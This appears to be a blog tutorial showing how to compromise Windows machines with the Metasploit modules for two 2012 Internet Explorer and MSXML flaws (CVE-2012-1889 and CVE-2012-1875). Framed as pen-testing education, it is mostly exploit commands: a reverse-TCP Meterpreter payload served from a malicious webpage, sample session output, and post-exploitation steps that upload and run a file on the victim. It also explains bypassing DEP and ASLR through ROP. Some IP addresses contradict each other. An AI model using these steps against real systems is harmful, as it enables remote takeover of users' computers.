CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information.



Hi, Today i am going to explain how to hack the Windows system using the recent IE exploit.  This article is intend to educate PenTesters.  If you don't know what Penetration testing means, then please reads this article.  Also please read the previous articles on Pen Testing.

CVE-2012-1875 : MS12-037 Internet Explorer Same ID Vulnerability
Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL - one which was compiled before ASLR become the norm, and
therefore doesn't support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ):


Requirements:
  • Target OS: XP3
  • Attacker OS : Backtrack or any PenTesting Distros
As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM.  Change the VM's Network adapter to the Host-only-adapter. (if you don't know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the 'ms12_037_same_id.rb' module and paste in this directory "/opt/metasploit/msf3/modules/exploits/windows/browser/"

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type " use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Ok, let us launch the exploit.

Type "exploit" in the console.


Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon

Comments system